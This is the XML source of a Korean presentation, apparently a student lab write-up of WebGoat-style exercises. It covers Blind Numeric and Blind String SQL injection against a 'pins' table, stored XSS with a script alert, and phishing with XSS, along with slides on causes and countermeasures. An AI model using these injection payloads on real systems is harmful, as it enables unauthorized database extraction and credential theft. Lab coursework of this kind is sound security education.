            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24578" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP47_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2"/>
            <a:ext cx="7178155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4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Numeric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5602" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP48_\캡처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5" y="1605082"/>
            <a:ext cx="7178155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86030" y="1605082"/>
            <a:ext cx="2618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Account number is valid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 나왔으므로 해당 질의는 옳다 따라서 나의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Account Number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>2500</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>보다 작다는 것은 옳다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5" y="5887270"/>
            <a:ext cx="979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101 AND ((select pin from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pins </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>cc_number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>=‘1111222233334444')&lt;2500);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Numeric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6030" y="1605082"/>
            <a:ext cx="2618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Invalid account number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 나왔으므로 해당 질의는 옳다 따라서 나의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Account Number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>1000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>보다 작다는 것은 옳지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>않다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5" y="5887270"/>
            <a:ext cx="979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101 AND ((select pin from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pins </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>cc_number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>=‘1111222233334444')&lt;1000);</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26626" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP49_\캡처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2"/>
            <a:ext cx="7178155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Numeric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6030" y="1605082"/>
            <a:ext cx="2618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Invalid account number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 나왔으므로 해당 질의는 옳다 따라서 나의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Account Number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>1000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>보다 작다는 것은 옳지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>않다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5" y="5887270"/>
            <a:ext cx="979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101 AND ((select pin from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pins </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>cc_number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>=‘1111222233334444')&lt;1000);</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26626" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP49_\캡처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2"/>
            <a:ext cx="7178155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Phishing with XSS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Script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>를 입력하고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>를 클릭하였을 대 임의의 입력하는 부분이 추가된 모습입니다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2050" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP4_\xss0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5" y="1466850"/>
            <a:ext cx="6269275" cy="472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Numeric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6030" y="1605082"/>
            <a:ext cx="261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위의 과정을 반복하여 범위를 접혀 나가여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Account Number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>를 구할 수 있습니다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26626" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP49_\캡처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2"/>
            <a:ext cx="7178155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C:\Users\rndlr\AppData\Local\Temp\_AZTMP54_\캡처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3" y="1605082"/>
            <a:ext cx="7178155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String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9699" name="Picture 3" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP56_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2" y="1605082"/>
            <a:ext cx="7178156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86030" y="1605082"/>
            <a:ext cx="26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8586028" y="1605082"/>
            <a:ext cx="2619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/>
              <a:t>문자 비교를 통해 문자열을 구하기에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>앞서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>문자열의 길이를 구하기 위한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Blind Numeric SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>을 실행합니다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해당 질의가 옳지 않다고 하였으므로 문자열의 길이는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>초</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>과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2" y="5887270"/>
            <a:ext cx="979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101 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>name FROM pins WHERE cc_number=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>'4321432143214321</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>')&lt;3);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String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9699" name="Picture 3" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP56_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2" y="1605082"/>
            <a:ext cx="7178156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86030" y="1605082"/>
            <a:ext cx="26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8586028" y="1605082"/>
            <a:ext cx="2619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해당 질의가 옳다고 하였으므로 문자열의 길이는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>미만입니다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따라서 해당 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Account Number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>문자열의 길이는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>4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2" y="5887270"/>
            <a:ext cx="979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101 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>name FROM pins WHERE cc_number=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>'4321432143214321</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>')&lt;5);</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30722" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP57_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2"/>
            <a:ext cx="7178153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0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String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9699" name="Picture 3" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP56_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2" y="1605082"/>
            <a:ext cx="7178156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86030" y="1605082"/>
            <a:ext cx="26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8586028" y="1605082"/>
            <a:ext cx="2619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해당 쿼리는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>번째 문자부터 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>번째 문자 까지 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>‘H’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 있는지 참</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>거짓을 묻는 질의입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>이때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Invalid account number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 나왔으므로 문자열의 첫 문자는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 아닙니다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2" y="5887270"/>
            <a:ext cx="979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101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) &lt; 'H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30722" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP57_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2"/>
            <a:ext cx="7178153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C:\Users\rndlr\AppData\Local\Temp\_AZTMP58_\a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1"/>
            <a:ext cx="7178155" cy="43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String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9699" name="Picture 3" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP56_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2" y="1605082"/>
            <a:ext cx="7178156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86030" y="1605082"/>
            <a:ext cx="26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8586028" y="1605082"/>
            <a:ext cx="2619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Invalid account number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 나왔으므로 문자열의 첫 문자는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 아닙니다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2" y="5887270"/>
            <a:ext cx="979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101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600"/>
              <a:t>&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" smtClean="0"/>
              <a:t>‘I' );</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30722" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP57_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2"/>
            <a:ext cx="7178153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C:\Users\rndlr\AppData\Local\Temp\_AZTMP58_\a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1"/>
            <a:ext cx="7178155" cy="43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0" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP60_\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1" y="1605081"/>
            <a:ext cx="7178155" cy="42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String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9699" name="Picture 3" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP56_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2" y="1605082"/>
            <a:ext cx="7178156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86030" y="1605082"/>
            <a:ext cx="26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8586028" y="1605082"/>
            <a:ext cx="2619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Account number is valid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 나왔으므로 문자열의 첫 문자는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 맞습니다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07872" y="5887270"/>
            <a:ext cx="979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101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600"/>
              <a:t>&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" smtClean="0"/>
              <a:t>‘J' );</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30722" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP57_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2"/>
            <a:ext cx="7178153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C:\Users\rndlr\AppData\Local\Temp\_AZTMP58_\a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1"/>
            <a:ext cx="7178155" cy="43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C:\Users\rndlr\AppData\Local\Temp\_AZTMP62_\a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1" y="1605082"/>
            <a:ext cx="7178156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String SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR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9699" name="Picture 3" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP56_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2" y="1605082"/>
            <a:ext cx="7178156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86030" y="1605082"/>
            <a:ext cx="26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8586028" y="1605082"/>
            <a:ext cx="2619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위의 과정을 반복하여 최종적인 문자열을 찾아냅니다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과제의 최종적인 문자열은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>‘Jill’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30722" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP57_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2"/>
            <a:ext cx="7178153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 descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP58_\a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605081"/>
            <a:ext cx="7178155" cy="43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C:\Users\rndlr\AppData\Local\Temp\_AZTMP62_\a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1" y="1605082"/>
            <a:ext cx="7178156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 descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP63_\a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5" y="1605082"/>
            <a:ext cx="7178152" cy="4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543050" y="174930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악의적인 문자열 삽입 대신 쿼리 결과에 따라 정보를 취득하는 기법이다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Blind SQL Injection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substr()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ascii()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함수를 사용하여 쿼리의 결과를 얻어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한글자씩 끊어온 값을 아스키코드로 변환시키고 임의의 숫자와 비교하여 참과 거짓을 비교하는 과정을 거쳐가며 계속 질의를 보내어 일치하는 아스키코드를 찾아낸다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Blind Numeric SQL Injection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3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543050" y="174930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개발자가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SQL Query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가 공격받을 수 있다는 점을 간과하고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, query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를 신뢰할 수 있는 명령으로 가정했을 경우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SQL Query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를 만들 때 정적 인수로 조합했을 경우</a:t>
            </a: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입력 검증이 없고 데이터베이스에 슈퍼유저나 사용자를 만들 수 있는 사용자로 접속하는 경우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SQL injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" smtClean="0">
                <a:latin typeface="나눔바른고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="나눔바른고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>원인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6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SQL injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" smtClean="0">
                <a:latin typeface="나눔바른고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="나눔바른고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>대응 방법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886802635"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2127931" y="1119716"/>
          <a:ext cx="8128000" cy="5262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3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Phishing with XSS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0500" y="1466850"/>
            <a:ext cx="3219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Username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>입력 필드와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>입력 필드에 값을 입력하고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>버튼을 클릭하면 사용자가 입력한 데이터가 출력되는 화면이다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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>실제로는 설정한 페이지로 값이 넘어가게 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP5_\xss0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12" y="1466851"/>
            <a:ext cx="6235338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2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XSS  stage1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 descr="C:\Users\rndlr\Desktop\xx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74" y="1324799"/>
            <a:ext cx="8860075" cy="488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XSS  stage1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43050" y="174930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David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로 로그인한다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View Profile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을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누른 후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Edit Profile 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클릭한다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Street field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&lt;Script&gt;alert(‘XSS’)&lt;/Script&gt;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를 입력한다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Update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를 누른 후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Jerry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로 로그인한다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smtClean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List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에서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David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를 누른 후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View Profile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을 클릭한다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5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XSS  </a:t>
            </a:r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stage3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098" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP10_\xs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80" y="1447800"/>
            <a:ext cx="922447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2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1407875" y="235150"/>
            <a:ext cx="8229600" cy="6830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XSS  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" smtClean="0">
                <a:latin typeface="나눔바른고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="나눔바른고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>stage3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" b="1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43050" y="2416057"/>
            <a:ext cx="8900403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Stage1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에서의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XSS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가 아직 작동하는지 확인하는 과제이지만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Developer mode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를 사용할 수 없어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Stage2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를 수행하지 않아 아무런 조작을 하지 않아도 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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="HY견고딕" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY견고딕" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>가 작동하고 성공했다고 판단하게 된다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2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5152</TotalTime>
  <Words>1629</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>사용자 지정</PresentationFormat>
  <Paragraphs>208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정구익</cp:lastModifiedBy>
  <cp:revision>38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-03-12T15:04:52Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-09-25T19:11:44Z</dcterms:modified>
</cp:coreProperties>
</file>